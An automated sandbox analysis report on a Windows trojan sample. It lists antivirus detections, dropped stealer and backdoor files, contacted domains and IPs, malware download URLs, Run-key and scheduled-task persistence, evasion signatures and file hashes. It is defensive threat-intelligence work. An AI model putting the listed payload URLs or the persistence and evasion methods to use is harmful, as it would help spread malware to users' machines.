(overwrites its own PE header) 28->123 125 Machine Learning detection for dropped file 28->125 141 3 other signatures 28->141 38 cmd.exe 1 28->38         started        41 cmd.exe 2 28->41         started        43 sc.exe 1 28->43         started        47 3 other processes 28->47 127 Found evasive API chain (may stop execution after checking mutex) 32->127 129 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 32->129 131 Found evasive API chain (may stop execution after checking computer name) 32->131 143 2 other signatures 32->143 133 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 34->133 145 3 other signatures 34->145 135 Antivirus detection for dropped file 36->135 137 Multi AV Scanner detection for dropped file 36->137 139 Injects a PE file into a foreign processes 36->139 45 768F.exe 36->45         started        signatures14 process15 file16 59 C:\Windows\SysWOW64\...\qxoxlxqh.exe (copy), PE32 38->59 dropped 49 conhost.exe 38->49         started        51 conhost.exe 41->51         started        53 conhost.exe 43->53         started        55 conhost.exe 47->55         started        57 conhost.exe 47->57         started        process17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      V91yW08J6p.exe47%ReversingLabsWin32.Trojan.CrypterX
                      V91yW08J6p.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\E6AF.exe100%AviraTR/AD.StellarStealer.rfurr
                      C:\Users\user\AppData\Local\Temp\768F.exe100%AviraHEUR/AGEN.1211353
                      C:\Users\user\AppData\Local\Temp\FF1A.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\7CCD.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\76E7.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\1365.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\E6AF.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\6902.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2D5.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\vsiicvb100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2941.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\adiicvb100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\768F.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\768F.exe67%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      26.3.qxoxlxqh.exe.d70000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      8.2.76E7.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.2.76E7.exe.20d0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      13.0.768F.exe.2c0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      13.0.768F.exe.2c0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      2.0.V91yW08J6p.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.768F.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      6.0.adiicvb.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.3.7CCD.exe.5b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.7CCD.exe.480e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.0.768F.exe.360000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      11.3.6902.exe.600000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.0.V91yW08J6p.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.6902.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      23.0.768F.exe.360000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      8.3.76E7.exe.20f0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.0.V91yW08J6p.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.0.adiicvb.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.0.768F.exe.360000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      26.2.qxoxlxqh.exe.d50e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      13.0.768F.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      6.0.adiicvb.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.6902.exe.5e0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      26.2.qxoxlxqh.exe.db0000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                      23.2.768F.exe.360000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      23.0.768F.exe.360000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      7.2.7CCD.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.V91yW08J6p.exe.5415a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.adiicvb.6115a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.1.adiicvb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.1.V91yW08J6p.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.2.qxoxlxqh.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      13.0.768F.exe.2c0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      2.2.V91yW08J6p.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.adiicvb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://unicupload.top/install5.exe100%URL Reputationphishing
                      http://185.163.204.24/0%Avira URL Cloudsafe
                      http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/game.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/9993_1641737702_2517.exe100%Avira URL Cloudmalware
                      http://unic11m.top/install1.exe100%Avira URL Cloudmalware
                      http://amogohuigotuli.at/0%URL Reputationsafe
                      http://78.46.160.87/mozglue.dll100%Avira URL Cloudmalware
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      http://host-data-coin-11.com/0%URL Reputationsafe
                      http://unicupload.top/install1.exe100%Avira URL Cloudmalware
                      http://78.46.160.87/nss3.dll0%Avira URL Cloudsafe
                      http://78.46.160.87/msvcp140.dll0%Avira URL Cloudsafe
                      http://185.163.204.22/capibar0%Avira URL Cloudsafe
                      http://78.46.160.87/565100%Avira URL Cloudmalware
                      http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad310%Avira URL Cloudsafe
                      http://78.46.160.87/freebl3.dll100%Avira URL Cloudmalware
                      http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d800%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dl.uploadgram.me
                      		176.9.247.226
                      		truefalse
                        		high
                        yandex.ru
                        		5.255.255.50
                        		truefalse
                          		high
                          github.com
                          		140.82.121.3
                          		truefalse
                            		high
                            patmushta.info
                            		8.209.79.15
                            		truefalse
                              		high
                              raw.githubusercontent.com
                              		185.199.108.133
                              		truefalse
                                		high
                                cdn.discordapp.com
                                		162.159.129.233
                                		truefalse
                                  		high
                                  iplogger.org
                                  		148.251.234.83
                                  		truefalse
                                    		high
                                    noc.social
                                    		149.28.78.238
                                    		truefalse
                                      		high
                                      unicupload.top
                                      		54.38.220.85
                                      		truefalse
                                        		high
                                        amogohuigotuli.at
                                        		5.163.255.148
                                        		truefalse
                                          		high
                                          host-data-coin-11.com
                                          		5.188.88.184
                                          		truefalse
                                            		high
                                            bit.ly
                                            		67.199.248.11
                                            		truefalse
                                              		high
                                              microsoft-com.mail.protection.outlook.com
                                              		104.47.54.36
                                              		truefalse
                                                		high
                                                api.2ip.ua
                                                		77.123.139.190
                                                		truefalse
                                                  		high
                                                  goo.su
                                                  		172.67.139.105
                                                  		truefalse
                                                    		high
                                                    transfer.sh
                                                    		144.76.136.153
                                                    		truefalse
                                                      		high
                                                      a0620531.xsph.ru
                                                      		141.8.192.58
                                                      		truefalse
                                                        		high
                                                        softwaresworld.net
                                                        		94.102.49.170
                                                        		truefalse
                                                          		high
                                                          data-host-coin-8.com
                                                          		5.188.88.184
                                                          		truefalse
                                                            		high
                                                            unic11m.top
                                                            		54.38.220.85
                                                            		truefalse
                                                              		high
                                                              srtuiyhuali.at
                                                              		unknown
                                                              		unknownfalse
                                                                		high
                                                                fufuiloirtu.com
                                                                		unknown
                                                                		unknownfalse
                                                                  		high
                                                                  api.ip.sb
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		high
                                                                    privacytools-foryou-777.com
                                                                    		unknown
                                                                    		unknownfalse
                                                                      		high

                                                                      Contacted URLs

                                                                      NameMaliciousAntivirus DetectionReputation
                                                                      http://a0620531.xsph.ru/htrrfwedsqw.exefalse
                                                                        		high
                                                                        http://unicupload.top/install5.exetrue
                                                                        • URL Reputation: phishing
                                                                        		unknown
                                                                        http://185.163.204.24/false
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://a0620531.xsph.ru/RMR.exefalse
                                                                          		high
                                                                          http://data-host-coin-8.com/game.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://data-host-coin-8.com/files/9993_1641737702_2517.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://unic11m.top/install1.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://amogohuigotuli.at/false
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://78.46.160.87/mozglue.dlltrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://185.7.214.171:8080/6.phptrue
                                                                          • URL Reputation: malware
                                                                          		unknown
                                                                          http://host-data-coin-11.com/false
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://unicupload.top/install1.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://78.46.160.87/nss3.dlltrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://78.46.160.87/msvcp140.dlltrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://185.163.204.22/capibarfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://a0620531.xsph.ru/6.exefalse
                                                                            		high
                                                                            http://a0620531.xsph.ru/c_setup.exefalse
                                                                              		high
                                                                              http://78.46.160.87/565true
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad31false
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://78.46.160.87/freebl3.dlltrue
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              http://185.163.204.24//l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d80false
                                                                              • Avira URL Cloud: safe
                                                                              		unknown

                                                                              URLs from Memory and Binaries

                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://api.ip.sb/ip768F.exe, 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, 768F.exe, 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown

                                                                              Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              185.163.45.70
                                                                              		unknownMoldova Republic of
                                                                              		39798MIVOCLOUDMDfalse
                                                                              188.166.28.199
                                                                              		unknownNetherlands
                                                                              		14061DIGITALOCEAN-ASNUStrue
                                                                              172.67.139.105
                                                                              		goo.suUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              54.38.220.85
                                                                              		unicupload.topFrance
                                                                              		16276OVHFRfalse
                                                                              104.47.54.36
                                                                              		microsoft-com.mail.protection.outlook.comUnited States
                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              175.119.10.231
                                                                              		unknownKorea Republic of
                                                                              		9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                              110.14.121.125
                                                                              		unknownKorea Republic of
                                                                              		9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                              144.76.136.153
                                                                              		transfer.shGermany
                                                                              		24940HETZNER-ASDEfalse
                                                                              78.46.160.87
                                                                              		unknownGermany
                                                                              		24940HETZNER-ASDEtrue
                                                                              185.7.214.171
                                                                              		unknownFrance
                                                                              		42652DELUNETDEtrue
                                                                              162.159.129.233
                                                                              		cdn.discordapp.comUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              185.186.142.166
                                                                              		unknownRussian Federation
                                                                              		204490ASKONTELRUtrue
                                                                              67.199.248.11
                                                                              		bit.lyUnited States
                                                                              		396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                                              94.102.49.170
                                                                              		softwaresworld.netNetherlands
                                                                              		202425INT-NETWORKSCfalse
                                                                              77.123.139.190
                                                                              		api.2ip.uaUkraine
                                                                              		25229VOLIA-ASUAfalse
                                                                              140.82.121.3
                                                                              		github.comUnited States
                                                                              		36459GITHUBUSfalse
                                                                              86.107.197.138
                                                                              		unknownRomania
                                                                              		39855MOD-EUNLfalse
                                                                              61.98.7.133
                                                                              		unknownKorea Republic of
                                                                              		9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                              104.21.38.221
                                                                              		unknownUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              5.163.255.148
                                                                              		amogohuigotuli.atSaudi Arabia
                                                                              		25019SAUDINETSTC-ASSAfalse
                                                                              149.28.78.238
                                                                              		noc.socialUnited States
                                                                              		20473AS-CHOOPAUSfalse
                                                                              185.233.81.115
                                                                              		unknownRussian Federation
                                                                              		50113SUPERSERVERSDATACENTERRUtrue
                                                                              8.209.79.15
                                                                              		patmushta.infoSingapore
                                                                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                              5.188.88.184
                                                                              		host-data-coin-11.comRussian Federation
                                                                              		34665PINDC-ASRUfalse
                                                                              141.8.192.58
                                                                              		a0620531.xsph.ruRussian Federation
                                                                              		35278SPRINTHOSTRUfalse
                                                                              185.199.108.133
                                                                              		raw.githubusercontent.comNetherlands
                                                                              		54113FASTLYUSfalse
                                                                              185.163.204.22
                                                                              		unknownGermany
                                                                              		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                              185.163.204.24
                                                                              		unknownGermany
                                                                              		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse

                                                                              Private

                                                                              IP
                                                                              192.168.2.1

                                                                              General Information

                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                              Analysis ID:551101
                                                                              Start date:11.01.2022
                                                                              Start time:20:42:02
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 16m 52s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:light
                                                                              Sample file name:V91yW08J6p.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:45
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.rans.troj.evad.winEXE@52/19@109/29
                                                                              EGA Information:
                                                                              • Successful, ratio: 90%
                                                                              HDC Information:
                                                                              • Successful, ratio: 32.8% (good quality ratio 26.9%)
                                                                              • Quality average: 66.2%
                                                                              • Quality standard deviation: 37.8%
                                                                              HCA Information:
                                                                              • Successful, ratio: 98%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Found application associated with file extension: .exe
                                                                              Warnings:
                                                                              Show All
                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                              • TCP Packets have been reduced to 100
                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 51.11.168.232, 20.49.150.241, 131.253.33.200, 13.107.22.200, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 172.67.75.172, 104.26.13.31, 104.26.12.31
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, api.ip.sb.cdn.cloudflare.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net
                                                                              • Execution Graph export aborted for target 768F.exe, PID 6952 because there are no executed function
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • VT rate limit hit for: V91yW08J6p.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              20:43:46Task SchedulerRun new task: Firefox Default Browser Agent F2CB121A05C12497 path: C:\Users\user\AppData\Roaming\adiicvb
                                                                              20:44:06API Interceptor1x Sleep call for process: 76E7.exe modified
                                                                              20:44:38Task SchedulerRun new task: Firefox Default Browser Agent ECF4A541FD40CD6B path: C:\Users\user\AppData\Roaming\vsiicvb
                                                                              20:44:47API Interceptor4x Sleep call for process: E6AF.exe modified
                                                                              20:45:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
                                                                              20:45:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe
                                                                              20:46:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
                                                                              20:46:23Task SchedulerRun new task: MicrosoftApi path: "C:\Users\user\AppData\Roaming\ServiceApi\MicrosoftApi.exe"
                                                                              20:46:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              No context

                                                                              ASN

                                                                              No context

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\768F.exe.log
                                                                              Process:C:\Users\user\AppData\Local\Temp\768F.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):700
                                                                              Entropy (8bit):5.346524082657112
                                                                              Encrypted:false
                                                                              SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                              MD5:65CF801545098D915A06D8318D296A01
                                                                              SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                              SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                              SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                              C:\Users\user\AppData\Local\Temp\1365.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:MS-DOS executable
                                                                              Category:dropped
                                                                              Size (bytes):1335968
                                                                              Entropy (8bit):6.778646938974583
                                                                              Encrypted:false
                                                                              SSDEEP:12288:N4U4W7eu98+Xl4U4APyIrgyBc1mb8FyV30JBOTfGdHOoT1VP9SLyJPdQSgyR5daq:7P98+IIrgyv8Fs3UQyHRT1V8yJ1n
                                                                              MD5:DC36EBFC2796806A965589566C81E2A1
                                                                              SHA1:787EBB01105FF61A080631C977ACB05D94A021A7
                                                                              SHA-256:2B3DF46D7DD8E09722E98CF695137DDEDDE0BED7C32BE8A5495E915A5C24B3A4
                                                                              SHA-512:D5607CF8FA2AB926FE88FE09C11B8111003DEE3AC23F8D504A5FE5E326E91C743BA6618D34860536CC32E7541ED172C841C34C8567D68B865833593A803387AC
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L.....)...............0......d........... ... ....@..........................`............@..................................@.......P...a...........................................................................................................rdata...0.............................`.reloc.......@......................@....rsrc....a...P...a..................@..@.edata...............h..............@.......................................................................................................................................................................................................................................................................................................................!..g.Q7f.Qw.ZY*A..l..Hl.~.
                                                                              C:\Users\user\AppData\Local\Temp\28B3.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1644445
                                                                              Entropy (8bit):6.818331097494587
                                                                              Encrypted:false
                                                                              SSDEEP:24576:UDWHSb4N70TeyTzBXNlYSqA8AkNVg+6FRiwJliF4HCZ/LgRQ7jyc+HThm:v84eJ3Y+VkQ3tiFbl/sHtm
                                                                              MD5:B5536B068BB1098A1030F8C7DF17BFD2
                                                                              SHA1:4EC1F5A928376D3EBEF25CD703F9E17C715BEB1D
                                                                              SHA-256:53323C03A3B0411F3C9C7F4D13866BC6E79AD0BCDFB4416E51C5CB08AFBD65E1
                                                                              SHA-512:33FCCC6A74ADA26DD34B97696298263AD7E69A8800B839B6A5BDB8E23C8ACAC5274AE500388AA2C1C198EF28C4CF5EFC63180A7807C73A079EEC620C220967C0
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...+...._......._..'...._f.'...._..'...Rich&...........PE..L.....`.....................................0....@..........................@............@.........................0...4...d...<....0..........................|"......T............................U..@............0..`...... ....................text............................... ..`.rdata.."....0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..|".......$..................@..B................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2941.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):357376
                                                                              Entropy (8bit):7.849252713888167
                                                                              Encrypted:false
                                                                              SSDEEP:6144:D5aWbksiNTB6534zpo1j22P5Qvs4iiOBk2m65O3UlNwA9ju99Hm:D5atNT85AMevs4iPC2m6eoNwA9jujHm
                                                                              MD5:5263F286E45A03C8309FC8BB49E0F19A
                                                                              SHA1:A351CBD1C56F74115473C831442588653351231D
                                                                              SHA-256:83AE57BDC0F817111AB909F54EC0F33B84F6504596D2A55ADF39A16C5CF1AFC0
                                                                              SHA-512:E00F2ADB5BDF172D73006A0D813FA4FDAF60F1900297A43393E9EFC7C1187747E62BABF6FF9DDAFD019ECF306184B94FB1332313F00037F8DCE447C41159C4F3
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^...............0....@.........................................................................lq..........P...........................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc...P............\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2D5.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):752128
                                                                              Entropy (8bit):7.235022431975566
                                                                              Encrypted:false
                                                                              SSDEEP:12288:3WRxXhNF7PqC3t3agQ1DKoYf7Bz6q3MS0jLTESBr6MrIWc8unn:3WRZPJqq3aFtvYf7R6q3AB+Iu/
                                                                              MD5:C388DB9CA136D19310B76EF81E54FC12
                                                                              SHA1:EDCC614B7A82D45ABCD7CF6A4A320E96EBF74194
                                                                              SHA-256:BCDCAF81B3D7D4434C2A0CAF687317A8B641D0A7F6B32A9130E4CCBF289D2EB6
                                                                              SHA-512:C7C381654AEA4F294F44FB3D889CC633D03B9BA925BD0F570DE35E3A5F051720D178CF87C0B11EE722BB144CF6C61419BFEC4F4DF64ADC8076BFDE01B69EF07B
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L...,3R`.....................................0....@.................................JU.......................................]..P....0..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...8....p...X...T..............@....rsrc...P]...0......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\4ED.exe
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):615936
                                                                              Entropy (8bit):6.41244177881293
                                                                              Encrypted:false
                                                                              SSDEEP:12288:fILn6MEfztqUnUxs9iIoDyJRj86dMDexWcAch4tUTc6SDhVqkJZ9:fcJEhqW6UiIouJRj8qMDeccFh4ec7h4a
                                                                              MD5:7FE15A5F306240209441F528BE0F5783
                                                                              SHA1:8B346B7E81859D79EB29CF9C6B7FDA7C1A80D85E
                                                                              SHA-256:0C96D2A002820008CD17AAFBE1806A31EFDB3D37D5B2E6731C3AD8DDD4576812
                                                                              SHA-512:8AC50266684DF2D56BBAFB645E9B1C292E043C3F35AD59266F41C14DBCEEBAE20ADC72A7F8726D6C0074CB12D3CF9D4A3DBB6AD18212D6CAEC35742C94FF706B
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>X.$z9.wz9.wz9.wnR.vw9.wnR.v.9.wnR.vl9.w(L.vk9.w(L.vn9.w(L.v09.wnR.v.9.wz9.w.9.w.L.v{9.w.L.w{9.w.L.v{9.wRichz9.w........................PE..L...}..a.............................j............@.......................................@....................................<...............................t......................................@...............X............................text...C........................... ..`.7m512qw.....0...................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc..t............H..............@..B........................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\6902.exe
                                                                              Process:C:\Windows\explorer.exe
